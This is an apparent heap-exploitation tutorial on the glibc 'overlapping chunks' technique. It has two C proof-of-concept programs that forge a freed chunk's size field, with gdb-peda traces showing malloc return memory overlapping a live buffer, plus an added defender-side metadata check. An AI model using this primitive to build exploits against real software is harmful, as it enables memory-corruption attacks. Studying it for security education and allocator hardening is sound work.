Overlapping chunks

  • When memory is requested, the allocator first checks whether a chunk is available in the Unsorted bin.
    • If a chunk sits in the Unsorted list and that chunk is large enough to satisfy the requested size, that chunk is reallocated.
    • If the requested size is smaller than the chunk's size, only the requested amount is carved out of that chunk and the remaining space is returned to the arena.
    • If the space that would be left over after splitting is very small, the chunk is not split; it is reallocated whole.
  • "Overlapping chunks" changes the size of a free chunk so that a region larger than the chunk's original size is handed out from it.
    • The chunk allocated this way then overlaps the space of an existing chunk.
    • The value written into the free chunk's "size" must land exactly on the "mchunkptr" of the next free chunk, or on the Top chunk.
  • For example, allocate three chunks as below and free the middle one.
    • The value stored in the free chunk's "size" is 0x111; change it to 0x1a1.
    • The allocator now treats the free chunk's size as 0x1a1.
      • Accordingly, the location of the next chunk becomes 0x6022B0.
    • Requesting an allocation of size 0x198 then returns memory that overlaps the region of the third chunk.
Overlapping chunks flow(Top chunk)

  • Next, allocate five memory regions and free the fourth one.
    • Overwrite the "size" of the second chunk with 0x101, then free that chunk.
    • The second chunk's size becomes 0x100, so the start of the next chunk becomes 0x602180.
    • As a result, the second chunk's size is stored in the fourth chunk's "prev_size", and the PREV_INUSE flag (0x1) is cleared from the value in the fourth chunk's "size".
    • When an allocation of 224 (0xE0) bytes is then requested from malloc, it returns 0x602090, and that chunk's size is 0x100.
    • That is, the newly allocated memory overlaps the region of the third memory.
Overlapping chunks flow(Free chunk)
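The two flows above differ in what the forged "size" lands on, and that decides which defender-side check notices them. The following added example (not code from the original page or from glibc) rebuilds both heap layouts from constructed values that mirror the page's addresses (the Example 2 top-chunk size is invented, since the trace does not show it), runs a metadata consistency test modelled on the checks glibc 2.29 and later apply to unsorted-bin chunks ("mismatching next->prev_size", "invalid next->prev_inuse"), and then walks the heap by size fields and compares every span against the program's own record of live pointers. `model_free` is a simplification of what free() writes into the neighbour of a non-fastbin chunk; `check_unsorted` and `walk_against_live` are this example's own names.

```c
/* Added example: defender-side checks over the chunk layouts this page traces.
 * Not glibc source; the addresses are constructed to match the page's traces. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HEAP_BASE   0x602000UL   /* first chunk address in the page's traces */
#define HEAP_QWORDS 0x80         /* 0x400 bytes of image, enough for both layouts */
#define SIZE_BITS   0x7UL        /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */
#define PREV_INUSE  0x1UL
#define HDR         0x10UL       /* prev_size + size */

static uint64_t heap[HEAP_QWORDS];

/* The chunk at address a is heap[(a - HEAP_BASE) / 8]; [0] = prev_size, [1] = size. */
static uint64_t *chunk(unsigned long a) { return heap + (a - HEAP_BASE) / 8; }
static unsigned long chunk_size(unsigned long c) { return chunk(c)[1] & ~SIZE_BITS; }
static unsigned long next_chunk(unsigned long c) { return c + chunk_size(c); }

/* Example 1 layout: buf1 (0x110), buf2 (0x110), buf3 (0x90), top at 0x6022b0. */
static unsigned long build_example1(void) {
    memset(heap, 0, sizeof heap);
    chunk(0x602000)[1] = 0x111;
    chunk(0x602110)[1] = 0x111;
    chunk(0x602220)[1] = 0x091;
    chunk(0x6022b0)[1] = 0x20d51;        /* top size as shown in the page's trace */
    return 0x6022b0;                     /* top chunk address */
}

/* Example 2 layout: five 0x80 chunks from 0x602000; the top size is constructed. */
static unsigned long build_example2(void) {
    memset(heap, 0, sizeof heap);
    for (unsigned long c = 0x602000; c < 0x602280; c += 0x80)
        chunk(c)[1] = 0x081;
    chunk(0x602280)[1] = 0x20d81;        /* constructed value, not from the page */
    return 0x602280;
}

/* Simplified free() of a non-fastbin chunk: write the chunk's size into
 * next->prev_size and clear next's PREV_INUSE bit (fastbin frees do neither). */
static void model_free(unsigned long c) {
    unsigned long next = next_chunk(c);
    chunk(next)[0] = chunk_size(c);
    chunk(next)[1] &= ~PREV_INUSE;
}

/* Check 1, modelled on the glibc 2.29+ unsorted-bin tests: NULL if the victim's
 * size agrees with its neighbour's metadata, otherwise the reason. */
static const char *check_unsorted(unsigned long victim, unsigned long top) {
    unsigned long size = chunk_size(victim);
    unsigned long next = next_chunk(victim);
    if (size < 2 * HDR || next > top)
        return "invalid size";
    if ((chunk(next)[0] & ~SIZE_BITS) != size)
        return "mismatching next->prev_size";
    if (chunk(next)[1] & PREV_INUSE)
        return "invalid next->prev_inuse";
    return NULL;
}

/* Check 2: walk chunks by their size fields and compare each span with the live
 * pointers the program holds.  Returns the first chunk whose span covers a live
 * buffer other than its own, or 0 when the walk is clean. */
static unsigned long walk_against_live(unsigned long top, const unsigned long *live, int nlive) {
    unsigned long c = HEAP_BASE;
    while (c < top) {
        unsigned long end = next_chunk(c);
        if (chunk_size(c) < 2 * HDR || end > top)
            return c;                        /* span runs off the arena */
        for (int i = 0; i < nlive; i++)
            if (live[i] != c + HDR && live[i] > c && live[i] < end)
                return c;                    /* span swallows another live buffer */
        c = end;
    }
    return 0;
}

struct verdict { const char *check; unsigned long walk; };
static const unsigned long live_ex1[] = { 0x602010, 0x602230 };            /* buf1, buf3 */
static const unsigned long live_ex2[] = { 0x602010, 0x602110, 0x602210 };  /* buf1, buf3, buf5 */

/* Top-chunk flow: buf2 is freed with its real size, then "size" becomes 0x1a1. */
static struct verdict run_example1(int forged) {
    unsigned long top = build_example1();
    model_free(0x602110);
    if (forged) chunk(0x602110)[1] = 0x1a1;
    return (struct verdict){ check_unsorted(0x602110, top), walk_against_live(top, live_ex1, 2) };
}

/* Free-chunk flow: "size" becomes 0x101 before the free, so the foot that
 * free() writes into chunk 4 already agrees with the forged size. */
static struct verdict run_example2(void) {
    unsigned long top = build_example2();
    chunk(0x602080)[1] = 0x101;
    model_free(0x602080);
    return (struct verdict){ check_unsorted(0x602080, top), walk_against_live(top, live_ex2, 3) };
}

int main(void) {
    struct verdict v[3] = { run_example1(0), run_example1(1), run_example2() };
    const char *name[3] = { "ex1 clean", "ex1 forged", "ex2 forged" };
    for (int i = 0; i < 3; i++)
        printf("%-10s metadata check: %-28s heap walk: %#lx\n", name[i],
               v[i].check ? v[i].check : "ok", v[i].walk);
    return 0;
}
```

Compile with `gcc -o chunk_checks chunk_checks.c`. The metadata check rejects the Top-chunk flow, because the top chunk's prev_size (0) does not match the forged size and its PREV_INUSE bit is set, but it accepts the Free-chunk flow, because free() itself wrote a foot consistent with the forged size. Only the walk against the program's own record of live allocations flags both cases (chunk 0x602110 and chunk 0x602080), which is why a heap checker needs an independent view of what the program believes is live rather than trusting the size fields alone.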

Example

Example1

  • This is the code for the "Overlapping chunks flow(Top chunk)" explained above.
    • It requests two allocations of size 0x100 and one of size 0x80 from malloc.
    • Using memset(), it fills the memory buf2 points to with the character 'B' and the memory buf3 points to with 'C'.
    • It then frees the second allocated memory (buf2).
    • It overwrites *(buf2 - 1) with a new chunk size (417).
    • It then requests an allocation of 408 bytes from malloc.
    • Finally it fills the newly allocated memory with 'A' and prints the data buf3 points to.
overlapping_chunks.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
 
void main(){
 
    unsigned long *buf1 = malloc(0x100);   /* chunk size 0x110 */
    unsigned long *buf2 = malloc(0x100);   /* chunk size 0x110, freed below */
    unsigned long *buf3 = malloc(0x80);    /* chunk size 0x90, the region that ends up overlapped */
 
    memset(buf2, 'B', 0x100);
    memset(buf3, 'C', 0x80);
 
    free(buf2);                            /* buf2's chunk goes to the Unsorted bin */
 
    *(buf2 - 1) = 417;                     /* buf2 - 1 is the size field: 0x111 -> 0x1a1 (417) */

    char *buf4 = malloc(408);              /* 408 = 0x198; the allocator hands back the resized chunk */
 
    memset(buf4,'A',408);                  /* writes past buf2's original end, into buf3 */
    fprintf(stderr,"buf3 : %s\n", (char *)buf3);
}
  • At 0x400658, 0x400666 and 0x400674, check the addresses of the allocated memory.
    • At 0x40068e and 0x4006a4, check the data filled into each memory region.
    • At 0x4006b0 and 0x4006b8, check the size value of the second chunk after it has been freed.
    • At 0x4006c9, check the newly allocated memory, and at 0x4006e3 check the data filled into it.
Breakpoints
lazenca0x0@ubuntu:~/Book$ gcc -o overlapping_chunks overlapping_chunks.c 
lazenca0x0@ubuntu:~/Book$ gdb -q ./overlapping_chunks
Reading symbols from ./overlapping_chunks...(no debugging symbols found)...done.
gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x0000000000400646 <+0>:	push   rbp
   0x0000000000400647 <+1>:	mov    rbp,rsp
   0x000000000040064a <+4>:	sub    rsp,0x20
   0x000000000040064e <+8>:	mov    edi,0x100
   0x0000000000400653 <+13>:	call   0x400530 <malloc@plt>
   0x0000000000400658 <+18>:	mov    QWORD PTR [rbp-0x20],rax
   0x000000000040065c <+22>:	mov    edi,0x100
   0x0000000000400661 <+27>:	call   0x400530 <malloc@plt>
   0x0000000000400666 <+32>:	mov    QWORD PTR [rbp-0x18],rax
   0x000000000040066a <+36>:	mov    edi,0x80
   0x000000000040066f <+41>:	call   0x400530 <malloc@plt>
   0x0000000000400674 <+46>:	mov    QWORD PTR [rbp-0x10],rax
   0x0000000000400678 <+50>:	mov    rax,QWORD PTR [rbp-0x18]
   0x000000000040067c <+54>:	mov    edx,0x100
   0x0000000000400681 <+59>:	mov    esi,0x42
   0x0000000000400686 <+64>:	mov    rdi,rax
   0x0000000000400689 <+67>:	call   0x400500 <memset@plt>
   0x000000000040068e <+72>:	mov    rax,QWORD PTR [rbp-0x10]
   0x0000000000400692 <+76>:	mov    edx,0x80
   0x0000000000400697 <+81>:	mov    esi,0x43
   0x000000000040069c <+86>:	mov    rdi,rax
   0x000000000040069f <+89>:	call   0x400500 <memset@plt>
   0x00000000004006a4 <+94>:	mov    rax,QWORD PTR [rbp-0x18]
   0x00000000004006a8 <+98>:	mov    rdi,rax
   0x00000000004006ab <+101>:	call   0x4004f0 <free@plt>
   0x00000000004006b0 <+106>:	mov    rax,QWORD PTR [rbp-0x18]
   0x00000000004006b4 <+110>:	sub    rax,0x8
   0x00000000004006b8 <+114>:	mov    QWORD PTR [rax],0x1a1
   0x00000000004006bf <+121>:	mov    edi,0x198
   0x00000000004006c4 <+126>:	call   0x400530 <malloc@plt>
   0x00000000004006c9 <+131>:	mov    QWORD PTR [rbp-0x8],rax
   0x00000000004006cd <+135>:	mov    rax,QWORD PTR [rbp-0x8]
   0x00000000004006d1 <+139>:	mov    edx,0x198
   0x00000000004006d6 <+144>:	mov    esi,0x41
   0x00000000004006db <+149>:	mov    rdi,rax
   0x00000000004006de <+152>:	call   0x400500 <memset@plt>
   0x00000000004006e3 <+157>:	mov    rax,QWORD PTR [rip+0x200976]        # 0x601060 <stderr@@GLIBC_2.2.5>
   0x00000000004006ea <+164>:	mov    rdx,QWORD PTR [rbp-0x10]
   0x00000000004006ee <+168>:	mov    esi,0x400794
   0x00000000004006f3 <+173>:	mov    rdi,rax
   0x00000000004006f6 <+176>:	mov    eax,0x0
   0x00000000004006fb <+181>:	call   0x400520 <fprintf@plt>
   0x0000000000400700 <+186>:	nop
   0x0000000000400701 <+187>:	leave  
   0x0000000000400702 <+188>:	ret    
End of assembler dump.
gdb-peda$ b *0x0000000000400658
Breakpoint 1 at 0x400658
gdb-peda$ b *0x0000000000400666
Breakpoint 2 at 0x400666
gdb-peda$ b *0x0000000000400674
Breakpoint 3 at 0x400674
gdb-peda$ b *0x000000000040068e
Breakpoint 4 at 0x40068e
gdb-peda$ b *0x00000000004006a4
Breakpoint 5 at 0x4006a4
gdb-peda$ b *0x00000000004006b0
Breakpoint 6 at 0x4006b0
gdb-peda$ b *0x00000000004006b8
Breakpoint 7 at 0x4006b8
gdb-peda$ b *0x00000000004006c9
Breakpoint 8 at 0x4006c9
gdb-peda$ b *0x00000000004006e3
Breakpoint 9 at 0x4006e3
gdb-peda$
  • The addresses returned by malloc are 0x602010 (buf1), 0x602120 (buf2) and 0x602230 (buf3).
Pointers of Allocated Memory
gdb-peda$ r
Starting program: /home/lazenca0x0/Book/overlapping_chunks 

Breakpoint 1, 0x0000000000400658 in main ()
gdb-peda$ i r rax
rax            0x602010	0x602010
gdb-peda$ c
Continuing.

Breakpoint 2, 0x0000000000400666 in main ()
gdb-peda$ i r rax
rax            0x602120	0x602120
gdb-peda$ c
Continuing.

Breakpoint 3, 0x0000000000400674 in main ()
gdb-peda$ i r rax
rax            0x602230	0x602230
gdb-peda$ 
  • memset filled buf2 with the character 'B' and buf3 with the character 'C'.
Filled the memory with characters.
gdb-peda$ c
Continuing.

Breakpoint 4, 0x000000000040068e in main ()
gdb-peda$ x/40gx 0x602120
0x602120:	0x4242424242424242	0x4242424242424242
0x602130:	0x4242424242424242	0x4242424242424242
0x602140:	0x4242424242424242	0x4242424242424242
0x602150:	0x4242424242424242	0x4242424242424242
0x602160:	0x4242424242424242	0x4242424242424242
0x602170:	0x4242424242424242	0x4242424242424242
0x602180:	0x4242424242424242	0x4242424242424242
0x602190:	0x4242424242424242	0x4242424242424242
0x6021a0:	0x4242424242424242	0x4242424242424242
0x6021b0:	0x4242424242424242	0x4242424242424242
0x6021c0:	0x4242424242424242	0x4242424242424242
0x6021d0:	0x4242424242424242	0x4242424242424242
0x6021e0:	0x4242424242424242	0x4242424242424242
0x6021f0:	0x4242424242424242	0x4242424242424242
0x602200:	0x4242424242424242	0x4242424242424242
0x602210:	0x4242424242424242	0x4242424242424242
0x602220:	0x0000000000000000	0x0000000000000091
0x602230:	0x0000000000000000	0x0000000000000000
0x602240:	0x0000000000000000	0x0000000000000000
0x602250:	0x0000000000000000	0x0000000000000000
gdb-peda$ c
Continuing.

Breakpoint 5, 0x00000000004006a4 in main ()
gdb-peda$ x/20gx 0x602230
0x602230:	0x4343434343434343	0x4343434343434343
0x602240:	0x4343434343434343	0x4343434343434343
0x602250:	0x4343434343434343	0x4343434343434343
0x602260:	0x4343434343434343	0x4343434343434343
0x602270:	0x4343434343434343	0x4343434343434343
0x602280:	0x4343434343434343	0x4343434343434343
0x602290:	0x4343434343434343	0x4343434343434343
0x6022a0:	0x4343434343434343	0x4343434343434343
0x6022b0:	0x0000000000000000	0x0000000000020d51
0x6022c0:	0x0000000000000000	0x0000000000000000
gdb-peda$ 
  • The second memory is freed, and the size value of its chunk is changed to 0x1a1.
Overwrite the size of the free chunk.
gdb-peda$ c
Continuing.

Breakpoint 6, 0x00000000004006b0 in main ()
gdb-peda$ p main_arena.bins[0]
$1 = (mchunkptr) 0x602110
gdb-peda$ p main_arena.bins[1]
$2 = (mchunkptr) 0x602110
gdb-peda$ c
Continuing.

Breakpoint 7, 0x00000000004006b8 in main ()
gdb-peda$ x/i $rip
=> 0x4006b8 <main+114>:	mov    QWORD PTR [rax],0x1a1
gdb-peda$ i r rax
rax            0x602118	0x602118
gdb-peda$ x/gx 0x602118
0x602118:	0x0000000000000111
gdb-peda$ ni

0x00000000004006bf in main ()
gdb-peda$ x/gx 0x602118
0x602118:	0x00000000000001a1
gdb-peda$ p main_arena.bins[0].size 
$3 = 0x1a1
gdb-peda$ 
  • When an allocation of 408 bytes is requested from malloc(), the allocator reallocates the second memory whose size was changed above.
    • The size of the reallocated memory is 0x1a0 (0x1a1 - 0x1), and its range is 0x602120 ~ 0x6022b0.
    • This region overlaps the memory buf3 points to.
Reallocation of Memory
gdb-peda$ c
Continuing.

Breakpoint 8, 0x00000000004006c9 in main ()
gdb-peda$ i r rax
rax            0x602120	0x602120
gdb-peda$ x/2gx 0x602120 - 0x10
0x602110:	0x0000000000000000	0x00000000000001a1
gdb-peda$ p/x 0x602110 + 0x1a0
$4 = 0x6022b0
gdb-peda$ 
  • When memset() fills the reallocated memory with 'A', the characters are also written into buf3's region.
The data overwrote the third memory.
gdb-peda$ c
Continuing.

Breakpoint 9, 0x00000000004006e3 in main ()
gdb-peda$ x/60gx 0x602120
0x602120:	0x4141414141414141	0x4141414141414141
0x602130:	0x4141414141414141	0x4141414141414141
0x602140:	0x4141414141414141	0x4141414141414141
0x602150:	0x4141414141414141	0x4141414141414141
0x602160:	0x4141414141414141	0x4141414141414141
0x602170:	0x4141414141414141	0x4141414141414141
0x602180:	0x4141414141414141	0x4141414141414141
0x602190:	0x4141414141414141	0x4141414141414141
0x6021a0:	0x4141414141414141	0x4141414141414141
0x6021b0:	0x4141414141414141	0x4141414141414141
0x6021c0:	0x4141414141414141	0x4141414141414141
0x6021d0:	0x4141414141414141	0x4141414141414141
0x6021e0:	0x4141414141414141	0x4141414141414141
0x6021f0:	0x4141414141414141	0x4141414141414141
0x602200:	0x4141414141414141	0x4141414141414141
0x602210:	0x4141414141414141	0x4141414141414141
0x602220:	0x4141414141414141	0x4141414141414141
0x602230:	0x4141414141414141	0x4141414141414141
0x602240:	0x4141414141414141	0x4141414141414141
0x602250:	0x4141414141414141	0x4141414141414141
0x602260:	0x4141414141414141	0x4141414141414141
0x602270:	0x4141414141414141	0x4141414141414141
0x602280:	0x4141414141414141	0x4141414141414141
0x602290:	0x4141414141414141	0x4141414141414141
0x6022a0:	0x4141414141414141	0x4141414141414141
0x6022b0:	0x0000000000000000	0x0000000000020d51
0x6022c0:	0x0000000000000000	0x0000000000000000
0x6022d0:	0x0000000000000000	0x0000000000000000
0x6022e0:	0x0000000000000000	0x0000000000000000
0x6022f0:	0x0000000000000000	0x0000000000000000
gdb-peda$ c
Continuing.
buf3 : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[Inferior 1 (process 2790) exited with code 0210]
Warning: not running
gdb-peda$

Example2

  • The following code is the example for the "Overlapping chunks flow(Free chunk)".
    • It requests five allocations from malloc.
    • After freeing the fourth memory, it overwrites the size value of the second chunk (buf2) with 0x101.
    • After freeing the second memory, it requests a new allocation from malloc.
    • It then fills that memory with the character 'C' and prints the data of the third memory.
overlapping_chunks2.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <unistd.h>
 
int main(){
    unsigned long *buf1 = malloc(112);     /* each request of 112 (0x70) bytes gives a 0x80 chunk */
    unsigned long *buf2 = malloc(112);
    unsigned long *buf3 = malloc(112);     /* the region that ends up overlapped */
    unsigned long *buf4 = malloc(112);
    unsigned long *buf5 = malloc(112);
 
    free(buf4);                            /* 0x80 chunk: goes to a fastbin */
 
    *(buf2 -1) = 0x101;                    /* buf2 - 1 is the size field: 0x81 -> 0x101 */
 
    free(buf2);                            /* freed with the forged size: lands in the Unsorted bin as 0x100 */
    char *buf6 = malloc(224);              /* 224 = 0xE0; the allocator hands back buf2's chunk */
 
    memset(buf6,'C',224);                  /* writes past buf2's original end, into buf3 */
    fprintf(stderr,"buf3 : %s\n", (char *)buf3);
}
  • At 0x400658, 0x400666, 0x400674, 0x400682 and 0x400690, check the addresses of the allocated memory.
    • At 0x4006a0, check that the fourth memory has been freed, and at 0x4006a8 check the change to the size value of the second memory.
    • At 0x4006bb, check that the second memory has been freed, and at 0x4006c5 check the address and size of the newly allocated memory.
    • At 0x4006df, check the data in the newly allocated memory and the printed data of buf3.
Breakpoints
lazenca0x0@ubuntu:~/Book$ gcc -o overlapping_chunks2 overlapping_chunks2.c 
lazenca0x0@ubuntu:~/Book$ gdb -q ./overlapping_chunks2
Reading symbols from ./overlapping_chunks2...(no debugging symbols found)...done.
gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x0000000000400646 <+0>:	push   rbp
   0x0000000000400647 <+1>:	mov    rbp,rsp
   0x000000000040064a <+4>:	sub    rsp,0x30
   0x000000000040064e <+8>:	mov    edi,0x70
   0x0000000000400653 <+13>:	call   0x400530 <malloc@plt>
   0x0000000000400658 <+18>:	mov    QWORD PTR [rbp-0x30],rax
   0x000000000040065c <+22>:	mov    edi,0x70
   0x0000000000400661 <+27>:	call   0x400530 <malloc@plt>
   0x0000000000400666 <+32>:	mov    QWORD PTR [rbp-0x28],rax
   0x000000000040066a <+36>:	mov    edi,0x70
   0x000000000040066f <+41>:	call   0x400530 <malloc@plt>
   0x0000000000400674 <+46>:	mov    QWORD PTR [rbp-0x20],rax
   0x0000000000400678 <+50>:	mov    edi,0x70
   0x000000000040067d <+55>:	call   0x400530 <malloc@plt>
   0x0000000000400682 <+60>:	mov    QWORD PTR [rbp-0x18],rax
   0x0000000000400686 <+64>:	mov    edi,0x70
   0x000000000040068b <+69>:	call   0x400530 <malloc@plt>
   0x0000000000400690 <+74>:	mov    QWORD PTR [rbp-0x10],rax
   0x0000000000400694 <+78>:	mov    rax,QWORD PTR [rbp-0x18]
   0x0000000000400698 <+82>:	mov    rdi,rax
   0x000000000040069b <+85>:	call   0x4004f0 <free@plt>
   0x00000000004006a0 <+90>:	mov    rax,QWORD PTR [rbp-0x28]
   0x00000000004006a4 <+94>:	sub    rax,0x8
   0x00000000004006a8 <+98>:	mov    QWORD PTR [rax],0x101
   0x00000000004006af <+105>:	mov    rax,QWORD PTR [rbp-0x28]
   0x00000000004006b3 <+109>:	mov    rdi,rax
   0x00000000004006b6 <+112>:	call   0x4004f0 <free@plt>
   0x00000000004006bb <+117>:	mov    edi,0xe0
   0x00000000004006c0 <+122>:	call   0x400530 <malloc@plt>
   0x00000000004006c5 <+127>:	mov    QWORD PTR [rbp-0x8],rax
   0x00000000004006c9 <+131>:	mov    rax,QWORD PTR [rbp-0x8]
   0x00000000004006cd <+135>:	mov    edx,0xe0
   0x00000000004006d2 <+140>:	mov    esi,0x43
   0x00000000004006d7 <+145>:	mov    rdi,rax
   0x00000000004006da <+148>:	call   0x400500 <memset@plt>
   0x00000000004006df <+153>:	mov    rax,QWORD PTR [rip+0x20097a]        # 0x601060 <stderr@@GLIBC_2.2.5>
   0x00000000004006e6 <+160>:	mov    rdx,QWORD PTR [rbp-0x20]
   0x00000000004006ea <+164>:	mov    esi,0x400794
   0x00000000004006ef <+169>:	mov    rdi,rax
   0x00000000004006f2 <+172>:	mov    eax,0x0
   0x00000000004006f7 <+177>:	call   0x400520 <fprintf@plt>
   0x00000000004006fc <+182>:	mov    eax,0x0
   0x0000000000400701 <+187>:	leave  
   0x0000000000400702 <+188>:	ret    
End of assembler dump.
gdb-peda$ b *0x0000000000400658
Breakpoint 1 at 0x400658
gdb-peda$ b *0x0000000000400666
Breakpoint 2 at 0x400666
gdb-peda$ b *0x0000000000400674
Breakpoint 3 at 0x400674
gdb-peda$ b *0x0000000000400682
Breakpoint 4 at 0x400682
gdb-peda$ b *0x0000000000400690
Breakpoint 5 at 0x400690
gdb-peda$ b *0x00000000004006a0
Breakpoint 6 at 0x4006a0
gdb-peda$ b *0x00000000004006a8
Breakpoint 7 at 0x4006a8
gdb-peda$ b *0x00000000004006bb
Breakpoint 8 at 0x4006bb
gdb-peda$ b *0x00000000004006c5
Breakpoint 9 at 0x4006c5
gdb-peda$ b *0x00000000004006df
Breakpoint 10 at 0x4006df
gdb-peda$
  • The pointers returned by malloc are 0x602010, 0x602090, 0x602110, 0x602190 and 0x602210.
Allocated Memory
gdb-peda$ r
Starting program: /home/lazenca0x0/Book/overlapping_chunks2 

Breakpoint 1, 0x0000000000400658 in main ()
gdb-peda$ i r rax
rax            0x602010	0x602010
gdb-peda$ c
Continuing.

Breakpoint 2, 0x0000000000400666 in main ()
gdb-peda$ i r rax
rax            0x602090	0x602090
gdb-peda$ c
Continuing.

Breakpoint 3, 0x0000000000400674 in main ()
gdb-peda$ i r rax
rax            0x602110	0x602110
gdb-peda$ c
Continuing.

Breakpoint 4, 0x0000000000400682 in main ()
gdb-peda$ i r rax
rax            0x602190	0x602190
gdb-peda$ c
Continuing.

Breakpoint 5, 0x0000000000400690 in main ()
gdb-peda$ i r rax
rax            0x602210	0x602210
gdb-peda$
  • After the fourth memory is freed, its chunk is placed in fastbinsY[6].
    • The size value of the second memory is changed to 0x101.
Changed the size value of the second memory.
gdb-peda$ c
Continuing.

Breakpoint 6, 0x00000000004006a0 in main ()
gdb-peda$ p main_arena.fastbinsY[6]
$3 = (mfastbinptr) 0x602180
gdb-peda$ c
Continuing.

Breakpoint 7, 0x00000000004006a8 in main ()
gdb-peda$ x/i $rip
=> 0x4006a8 <main+98>:	mov    QWORD PTR [rax],0x101
gdb-peda$ i r rax
rax            0x602088	0x602088
gdb-peda$ x/gx 0x602088
0x602088:	0x0000000000000081
gdb-peda$ ni

0x00000000004006af in main ()
gdb-peda$ x/gx 0x602088
0x602088:	0x0000000000000101
gdb-peda$ 
  • When the second memory is freed, its chunk is registered in the Unsorted bin, and the chunk's size is 0x100.
    • When an allocation of 224 bytes is requested from malloc, that chunk is reallocated.
Free the second memory and reallocate the memory
gdb-peda$ c
Continuing.

Breakpoint 8, 0x00000000004006bb in main ()
gdb-peda$ p main_arena.bins[0]
$4 = (mchunkptr) 0x602080
gdb-peda$ p main_arena.bins[1]
$5 = (mchunkptr) 0x602080
gdb-peda$ p main_arena.bins[0].size
$6 = 0x101
gdb-peda$ c
Continuing.

Breakpoint 9, 0x00000000004006c5 in main ()
gdb-peda$ i r rax
rax            0x602090	0x602090
gdb-peda$ x/2gx 0x602090 - 0x10
0x602080:	0x0000000000000000	0x0000000000000101
gdb-peda$ p/x 0x602090 + 0x100
$7 = 0x602190
gdb-peda$
  • When the newly allocated region is filled with the character 'C', the characters are also written over the third memory's region.
    • That is, the newly allocated memory and the third memory overlap.
The data overwrote the third memory.
gdb-peda$ c
Continuing.

Breakpoint 10, 0x00000000004006df in main ()
gdb-peda$ x/40gx 0x602090
0x602090:	0x4343434343434343	0x4343434343434343
0x6020a0:	0x4343434343434343	0x4343434343434343
0x6020b0:	0x4343434343434343	0x4343434343434343
0x6020c0:	0x4343434343434343	0x4343434343434343
0x6020d0:	0x4343434343434343	0x4343434343434343
0x6020e0:	0x4343434343434343	0x4343434343434343
0x6020f0:	0x4343434343434343	0x4343434343434343
0x602100:	0x4343434343434343	0x4343434343434343
0x602110:	0x4343434343434343	0x4343434343434343
0x602120:	0x4343434343434343	0x4343434343434343
0x602130:	0x4343434343434343	0x4343434343434343
0x602140:	0x4343434343434343	0x4343434343434343
0x602150:	0x4343434343434343	0x4343434343434343
0x602160:	0x4343434343434343	0x4343434343434343
0x602170:	0x0000000000000000	0x0000000000000000
0x602180:	0x0000000000000100	0x0000000000000081
0x602190:	0x0000000000000000	0x0000000000000000
0x6021a0:	0x0000000000000000	0x0000000000000000
0x6021b0:	0x0000000000000000	0x0000000000000000
0x6021c0:	0x0000000000000000	0x0000000000000000
gdb-peda$ c
Continuing.
buf3 : CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
[Inferior 1 (process 3085) exited normally]
Warning: not running
gdb-peda$ 

Related information